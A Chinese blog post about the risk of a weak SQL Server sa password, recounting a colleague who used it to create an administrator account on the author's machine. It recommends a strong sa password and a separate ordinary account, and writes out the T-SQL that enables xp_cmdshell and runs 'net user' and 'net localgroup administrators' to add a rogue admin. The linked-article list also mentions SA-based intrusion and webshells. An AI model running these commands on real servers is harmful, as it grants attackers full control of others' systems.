简单sa密码对数据库、服务器造成的危害

最新推荐文章于 2021-03-15 10:03:04 发布
最新推荐文章于 2021-03-15 10:03:04 发布
阅读量1.1k 收藏
点赞数
分类专栏: SQLServer-数据库引擎 文章标签: 数据库 服务器 脚本 xp user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangjh422/article/details/2119446
版权

今天一位同事,通过访问我的数据库,直接在我的机子上建了个黑客账户。使我百思不得其解,在我看来我的机子还是比较安全的,但是通过他的实际操作,才使我恍然大悟,原来是我的数据库的sa账户在作怪。

他通过我的sa账户,执行了脚本,然后就给我的机子上建立了hack账户。

看来我们在使用数据库的时候,都不太注意对sa账户的管理,这是错误的,解决办法:

1:安全的sa密码,

2:因为sa的权限比较大,所以要提供给其他人使用的话,还是建个普通账户。

 

通过执行脚本,使xp_cmdshell命令可用:

EXEC sp_configure 'xp_cmdshell', 1

reconfigure

假如说,系统同时xp_cmdshell不可用,可以使用下面的脚本扩大权限。

EXEC sp_configure 'show advanced options', 1

reconfigure

然后,就可以建立账户了。

exec master.dbo.xp_cmdshell 'net user /add hack 123'
exec master.dbo.xp_cmdshell 'net localgroup administrators hack /add' 

在这里0表示禁用,1表示启用。

wangjh422
关注
专栏目录
9.4 避免SQL注入
Kaitiren的专栏
02-22 121
什么是SQL注入 SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。 而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码。 SQL注入实例 很多Web
系统之SA弱口令带来的安全隐患
zgqtxwd的专栏
04-26 417
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
高危:弱密码问题
weixin_42660856的博客
12-04 1231
近期有不少用户反馈,由于服务器密码数据库密码设置太简单,导致数据被黑客盗取、甚至删除,造成了严重的后果。 信息安全是一个看不见但是非常重要的工作,由于大部分中小企业没有专门的信息安全管理员,但我们在云上运行我们的软件,处理我们的业务,信息安全是无可回避。 本文不对信息安全做过多的解释,就近期我们了解到的情况来说,请用户朋友们务必做好如下两个工作: 第一,将弱密码修改为强密码! 弱密码(Weak passwords)即容易破译的密码,多为简单的数字组合、帐号相同的数字组合、键盘上的临近键或常见姓名,例如.
记录一次数据库被盗,勿用弱密码
HNUCSEE的博客
12-16 367
背景 本学期一门编程新实务,几乎一学期的实验都在搞数据库编程,所以头一回接触数据库。完后做最后一次实验,安卓客户端登录注册,需要把注册信息保存到数据库。正好是windows服务器简单部署之后服务器端提供几个servlet接口给安卓客户端开发即可。这个数据库环境大概是一个多月前安装的。 传送门 javaweb部署到阿里云服务器 过程 完后正准备去验收实验时,做最后测试,按照往常一样打开网页端,查看数据库数据: 一脸懵逼,报错我的数据库表不存在,然后远程链接到服务器。 打开workbench看一下为啥表不在
SA权限入侵感悟
得峰的专栏 [网络收藏]
05-09 902
想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。黑客防线前几期 都曾经提到过它,也谈了它的危害,今天我就它的危害再谈点儿。我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件,否则得到Shell是有难度的。 1.存在SQL注入,并且数据库类型是MSSQL。 2.连接数据库的权限必须是SA。 3.后台必须有文件上传的程序。 好了,我们找到一个网址http://www.
提高SqlServer数据库的安全性,禁用掉sa账户
weixin_34390105的博客
11-13 245
  Sqlsever 数据库有两种登陆身份验证模式,一种是windows身份验证;一种是sqlserver 账户验证模式,在sqlserver 账户验证模式中,sa账户是大家所熟知的,并且sa也是内置的默认管理员账户,拥有 最高的操作权限;前面提到,sa账户是大家所熟知的,那么,一些别有用心的人也知道sa账户,这就为我们的数据安全留下了隐患; 黑客会通过扫描程序在互联网上大量扫描...
【网络安全与防护】-实训指导5.1.7数据库漏洞攻击SuperSQLEXEC工具的使用.doc
06-04
3. 在客户端安装并运行SuperSQLEXEC工具,通过输入服务器IP地址、SQL Server类型(如SQL Server 2000)、端口1433、默认管理员用户名sa密码,进行远程连接。 4. 使用SuperSQLEXEC工具执行命令,如查看C盘目录...
网络数据库安全性问题的分析与模型 (2003年)
04-23
在此案例中,攻击者利用了系统默认配置中的空密码sa用户,通过特定端口以sa用户身份登录,并利用系统提供的扩展存储过程执行系统指令,从而获取了操作系统的管理权限。这一过程不仅威胁到数据库服务器的安全,还可能...
数据库提权】- SQL Server提权
weixin_41949487的博客
03-15 1223
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以“低权限”身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通过“手段”让自己变为管理员用户,也可以理解为利用操作系统或软件应用程序中的错误,设计缺陷或配置错误来获得对更高访问权限的行为。 提权又分为系统提权、数据库提权、第三方提权等等,此篇文章就介绍了SQL Serve部分的提权方法,一起来看看吧。 知识补充 系统库 库名 含义 master .
C#连接数据库的异常捕获try and 数据库 ADO.NET
Dreamunicorn的博客
11-23 324
关键代码含义 解释: try 可能会出错的代码 catch 出错时要执行的代码,一旦程序出错了,catch就会有一个出错的对象,类型为Exception finally 出不出错都要执行的代码 代码展示: try{ //不出错时要执行的代码 }catch(Exception e){ Console.WriteLine(e);//输出错误的原因e }finally{ Console.WriteLine("程序结束");//出不出错都要执行的代码 } 数据库 ADO.NET 代码建立数据库的连接 导入工具
启用sa账号访问数据库
lengyuefeng212的博客
10-25 1847
安装好数据库之后怎么启用sa账号,来访问数据库。 1.先用windows账号登录数据库。 2.启用windows身份验证方式和sql server身份验证方式。 步骤: 右键属性 点击安全性 点击确定 确定 重启sql server 右键关闭再启动 再打开可视化软件 右键属性 点击状态,点击启用 修改sa密码 点击常规里面修改密码密码123456) 点击刷新 断开连接 输入sa输入密码 登录成功 昨天终于把学长的项目完结了,写了c#上位机和连接数据库。今天可以做自己的事情了,定个
SQL Server SA 密码丢失无法连接数据库怎么办?
weixin_34242658的博客
11-23 122
如果Windows账户无法连接并且SA密码也丢失了,那么如何可以连接到数据库呢?   答案是: 在单用户模式下启动SQL Server然后用本地管理员权限连接。登陆之后就可以修改SA密码了。   步骤:   1.      打开SQL Server配置管理器   2.      停掉SQL Server服务     3.      修改启动参数增加-m(单用户模式启动)   4.     ...
SQL Server中,搭建本地数据库服务,使用sa账户登录失败解决方法
u012138032的博客
12-23 9348
首先选择【Windows身份验证】模式连接数据库引擎。 在建立的连接上右键单击,选择【属性】,进入【服务器属性】界面。在左侧选择页中点击【安全性】,然后在右侧安全性设置界面的【服务器身份验证】一栏中选择【SQL Server和Windows身份验证模式】,点击【确定】按钮。 完成上述步骤之后,再次连接还是不能成功。这是因为初次使用登录名s
数据库基本概念介绍
记忆碎片的博客
06-21 1600
文章目录database和schema的区别数据库的三级模式与两级映像三级模式:外模式、概念模式、内模式两级映像:外模式映像、内模式映像数据库事务的四大特性(ACID)原子性一致性隔离性持久性内连接、外连接、交叉连接内连接外连接交叉连接DDL、DML、DQL、DCL、TCL语句的概念DDL(Data Definition Language,数据定义语言)DML( Data Manipulation...
javaweb学习总结(三十九)——数据库连接池
weixin_34324081的博客
10-18 584
一、应用程序直接获取数据库连接的缺点   用户每次请求都需要向数据库获得链接,而数据库创建连接通常需要消耗相对较大的资源,创建时间也较长。假设网站一天10万访问量,数据库服务器就需要创建10万次连接,极大的浪费数据库的资源,并且极易造成数据库服务器内存溢出、拓机。如下图所示:    二、使用数据库连接池优化程序性能 2.1、数据库连接池的基本概念   数据库连接是一种关键的有限的昂贵的资...
为什么不建议直接操作AX数据库
Larry's blog
09-21 1863
千万不要通过直接操作数据库的方式来修改AX数据,有这几方面的原因: 1.直接操作数据库可能会导致后续的业务逻辑没有被触发,这非常重要。 2.必须非常了解AX的核心思想,包括partitions/company/table inheritance/date-effective等等。 3.AX许多元数据,比如绝大多数重要的表关系,是写在代码里的。 4.规避AX安
黑客经验之sa弱口令强行入侵(转)
08-15 825
黑客经验之sa弱口令强行入侵(转)[@more@]  [编者按:仅供参考,切勿模仿!]   我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。   下面这些命令要SQL分离器才能...
Sybase数据库sa密码重置步骤:找回并修改
这个文件包含了数据库服务器的启动参数。 2. 编辑启动脚本:在该脚本中,找到`\data\master.dat-<服务器名>`后面的部分,添加`-psa`参数,这表示启用安全模式。确保添加正确并保存文件。 3. 停止服务器:如果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值